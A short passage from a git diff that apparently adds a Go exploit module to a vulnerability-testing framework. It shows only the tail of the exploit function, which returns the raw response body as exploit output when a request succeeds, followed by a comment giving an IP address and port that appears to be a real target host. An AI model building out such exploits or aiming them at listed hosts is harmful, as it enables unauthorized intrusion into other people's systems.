230	+	if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
231	+	expResult.Output = resp3.RawBody
232	+	expResult.Success = true
233	+	}
234	+
235	+	}
236	+	}
237	+	return expResult
238	+	},
239	+	))
240	+	}
241	+
242	+	//https://222.75.146.134:4433
243	+

Merge pull request #114 from jusk9527/main